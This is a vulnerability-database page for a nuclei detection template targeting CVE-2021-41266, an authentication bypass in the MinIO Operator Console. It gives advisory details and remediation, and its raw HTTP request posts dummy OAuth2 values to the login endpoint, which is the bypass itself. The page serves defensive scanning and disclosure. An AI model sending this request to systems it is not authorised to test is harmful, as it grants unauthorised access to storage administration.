Lucene search
K

MinIO Operator Console Authentication Bypass

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 168 Views

MinIO Operator Console Authentication Bypass. Allows unauthorized access to MinIO Operator Console. Update to v.0.12.3 or higher and disable external identity provider authentication

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-41266
15 Nov 202121:15
attackerkb
Circl
CVE-2021-41266
17 Nov 202116:27
circl
CNNVD
Minio 访问控制错误漏洞
15 Nov 202100:00
cnnvd
CNVD
Minio Access Control Error Vulnerability
17 Nov 202100:00
cnvd
CVE
CVE-2021-41266
15 Nov 202120:20
cve
Cvelist
CVE-2021-41266 Authentication bypass issue in the Operator Console
15 Nov 202120:20
cvelist
Github Security Blog
Authentication bypass issue in the Operator Console
15 Nov 202123:16
github
NVD
CVE-2021-41266
15 Nov 202121:15
nvd
OSV
CVE-2021-41266
15 Nov 202121:15
osv
OSV
GHSA-4999-659W-MQ36 Authentication bypass issue in the Operator Console
15 Nov 202123:16
osv
Rows per page
id: CVE-2021-41266

info:
  name: MinIO Operator Console Authentication Bypass
  author: alevsk
  severity: critical
  description: |
    MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the MinIO Operator Console.
  remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.'
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41266
    - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
    - https://github.com/minio/console/pull/1217
    - https://github.com/HimmelAward/Goby_POC
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-41266
    cwe-id: CWE-306
    epss-score: 0.46706
    epss-percentile: 0.9868
    cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: min
    product: minio_console
  tags: cve2021,cve,minio,min,vkev,vuln

http:
  - raw:
      - |
        POST /api/v1/login/oauth2/auth HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"code":"test","state":"test"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "sessionId"

      - type: word
        part: header
        words:
          - "token"

      - type: status
        status:
          - 201
          - 200
        condition: or
# digest: 4a0a0047304502207892a91386f525f0e86848909e30abe3114e00e1e74e79b8bdc8869d170dbe59022100d3c4f24788635c6e7615d14f802dcf80bde352f5bd30b47da3c2343ae1daf88b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.8
CVSS 3.18.6 - 9.8
EPSS0.46706
168